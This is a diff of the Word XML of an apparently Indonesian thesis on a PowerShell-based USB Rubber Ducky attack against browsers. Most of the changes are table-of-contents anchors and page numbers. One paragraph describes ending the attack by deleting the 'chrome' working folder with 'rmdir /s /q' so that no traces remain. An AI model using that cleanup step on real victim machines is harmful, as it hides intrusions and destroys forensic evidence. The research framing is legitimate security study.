         <w:t>. Baris Perintah Mengakhiri Penyerangan</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="129"/>
+      <w:bookmarkEnd w:id="130"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -36799,25 +33849,14 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Berdasarkan gambar diatas, dapat dilihat alur dalam mengakhiri penyerangan ini diawali dengan kembali ke direktori C: kemudian</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> menggunakan perintah </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">“rmdir /s /q” </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:t xml:space="preserve">untuk </w:t>
+        <w:t xml:space="preserve"> menggunakan perintah “rmdir /s /q” untuk </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -36857,14 +33896,7 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve"> yag telah digunakan selama penyerangan. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Setelah folder chrome terhapus maka langkah paling akhir adalah dengan keluar dari </w:t>
+        <w:t xml:space="preserve"> yag telah digunakan selama penyerangan. Setelah folder chrome terhapus maka langkah paling akhir adalah dengan keluar dari </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -37057,7 +34089,7 @@
         </w:numPr>
         <w:ind w:left="431" w:hanging="143"/>
       </w:pPr>
-      <w:bookmarkStart w:id="130" w:name="_Toc43087426"/>
+      <w:bookmarkStart w:id="131" w:name="_Toc43087426"/>
       <w:r>
         <w:t>DAFTAR</w:t>
       </w:r>
@@ -37066,7 +34098,7 @@
       </w:r>
       <w:bookmarkEnd w:id="47"/>
       <w:bookmarkEnd w:id="48"/>
-      <w:bookmarkEnd w:id="130"/>
+      <w:bookmarkEnd w:id="131"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -37695,7 +34727,7 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId37"/>
+      <w:footerReference w:type="default" r:id="rId39"/>
       <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
       <w:pgMar w:top="1701" w:right="1701" w:bottom="1701" w:left="2268" w:header="851" w:footer="851" w:gutter="0"/>
       <w:pgNumType w:start="1"/>
@@ -41961,6 +38993,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -43384,7 +40417,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E9A02FCD-9F58-4A0F-83A3-BE96503A931D}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B760906D-0DD6-4046-AB91-509AC9CC10F1}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/TA2_Abdul Azies Muslim_IMPLEMENTASI DAN ANALISIS KELEMAHAN PADA BROWSER DENGAN MENGGUNAKAN SERANGAN USB RUBBER DUCKY BERBASIS POWERSHELL.docx
+++ b/TA2_Abdul Azies Muslim_IMPLEMENTASI DAN ANALISIS KELEMAHAN PADA BROWSER DENGAN MENGGUNAKAN SERANGAN USB RUBBER DUCKY BERBASIS POWERSHELL.docx
@@ -522,7 +522,7 @@
       <w:bookmarkStart w:id="0" w:name="_Toc405949670"/>
       <w:bookmarkStart w:id="1" w:name="_Toc463344411"/>
       <w:bookmarkStart w:id="2" w:name="_Toc75146097"/>
-      <w:bookmarkStart w:id="3" w:name="_Toc43262036"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc43264804"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -898,7 +898,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc43262037"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc43264805"/>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -2393,7 +2393,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc43262038"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc43264806"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -2989,7 +2989,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc43262039"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc43264807"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -3244,7 +3244,7 @@
       </w:pPr>
       <w:bookmarkStart w:id="9" w:name="_Toc75146100"/>
       <w:bookmarkStart w:id="10" w:name="_Toc463344415"/>
-      <w:bookmarkStart w:id="11" w:name="_Toc43262040"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc43264808"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>KATA PENGANTAR</w:t>
@@ -3736,7 +3736,7 @@
       </w:r>
       <w:bookmarkStart w:id="12" w:name="_Toc75146101"/>
       <w:bookmarkStart w:id="13" w:name="_Toc463344416"/>
-      <w:bookmarkStart w:id="14" w:name="_Toc43262041"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc43264809"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>DAFTAR ISI</w:t>
@@ -3796,7 +3796,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc43262036" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264804" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3824,7 +3824,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262036 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264804 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3869,7 +3869,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262037" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264805" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3897,7 +3897,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262037 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264805 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3942,7 +3942,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262038" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264806" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3970,7 +3970,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262038 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264806 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4015,7 +4015,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262039" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264807" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4043,7 +4043,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262039 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264807 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4088,7 +4088,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262040" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264808" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4115,7 +4115,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262040 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264808 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4160,7 +4160,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262041" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264809" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4187,7 +4187,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262041 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264809 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4232,7 +4232,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262042" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264810" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4259,7 +4259,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262042 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264810 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4304,7 +4304,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262043" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264811" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4331,7 +4331,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262043 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264811 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4376,7 +4376,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262044" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264812" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4411,7 +4411,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262044 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264812 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4456,7 +4456,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262045" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264813" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4491,7 +4491,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262045 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264813 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4511,7 +4511,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4537,7 +4537,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262046" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264814" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4589,7 +4589,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262046 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264814 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4609,7 +4609,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>14</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4635,7 +4635,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262047" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264815" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4679,7 +4679,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262047 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264815 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4699,7 +4699,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>13</w:t>
+              <w:t>14</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4725,7 +4725,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262048" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264816" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4769,7 +4769,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262048 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264816 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4789,7 +4789,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>14</w:t>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4815,7 +4815,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262049" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264817" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4859,7 +4859,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262049 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264817 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4879,7 +4879,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>14</w:t>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4905,7 +4905,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262050" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264818" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4949,7 +4949,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262050 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264818 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4969,7 +4969,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4995,7 +4995,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262051" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264819" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5039,7 +5039,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262051 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264819 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5059,7 +5059,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5085,7 +5085,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262052" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264820" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5129,7 +5129,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262052 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264820 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5149,7 +5149,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5175,7 +5175,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262053" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264821" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5219,7 +5219,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262053 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264821 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5239,7 +5239,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>17</w:t>
+              <w:t>18</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5265,7 +5265,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262054" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264822" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5313,7 +5313,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262054 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264822 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5333,7 +5333,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>17</w:t>
+              <w:t>18</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5359,7 +5359,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262055" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264823" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5405,7 +5405,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262055 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264823 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5425,7 +5425,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>17</w:t>
+              <w:t>18</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5451,7 +5451,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262056" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264824" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5503,7 +5503,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262056 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264824 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5523,7 +5523,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>17</w:t>
+              <w:t>18</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5549,7 +5549,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262057" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264825" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5594,7 +5594,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262057 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264825 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5614,7 +5614,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>18</w:t>
+              <w:t>19</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5640,7 +5640,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262058" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264826" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5686,7 +5686,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262058 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264826 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5706,7 +5706,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>18</w:t>
+              <w:t>19</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5732,7 +5732,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262059" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264827" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5776,7 +5776,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262059 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264827 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5796,7 +5796,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>19</w:t>
+              <w:t>20</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5822,7 +5822,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262060" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264828" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5866,7 +5866,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262060 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264828 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5886,7 +5886,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>19</w:t>
+              <w:t>20</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5912,7 +5912,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262061" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264829" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5964,7 +5964,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262061 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264829 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5984,7 +5984,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>19</w:t>
+              <w:t>20</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6010,7 +6010,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262062" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264830" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -6054,7 +6054,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262062 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264830 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6074,7 +6074,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>20</w:t>
+              <w:t>21</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6100,7 +6100,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262063" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264831" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -6144,7 +6144,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262063 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264831 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6164,7 +6164,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>22</w:t>
+              <w:t>23</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6190,7 +6190,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262064" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264832" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -6234,7 +6234,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262064 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264832 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6254,7 +6254,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>24</w:t>
+              <w:t>25</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6280,7 +6280,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43262065" w:history="1">
+          <w:hyperlink w:anchor="_Toc43264833" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -6324,7 +6324,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43262065 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43264833 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6344,7 +6344,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>24</w:t>
+              <w:t>25</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6370,7 +6370,7 @@
